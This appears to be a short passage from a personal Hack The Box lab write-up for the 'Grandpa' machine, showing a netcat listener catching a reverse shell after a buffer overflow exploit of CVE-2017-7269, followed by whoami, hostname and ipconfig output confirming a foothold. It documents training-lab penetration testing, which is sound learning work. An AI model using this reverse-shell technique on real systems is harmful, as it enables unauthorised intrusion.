Buffer Overflow
^a4ea2d
This is the exploit that I found online.
Executing the modified exploit
┌──(kali㉿kali)-[~/archive/htb/labs/grandpa]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
c:\windows\system32\inetsrv> hostname
granpa
c:\windows\system32\inetsrv> ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ip address. . . . . . . . . . . . : 10.10.10.14
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
Received the shell.
Initial Foothold established as nt authority\network
service via exploiting CVE-2017-7269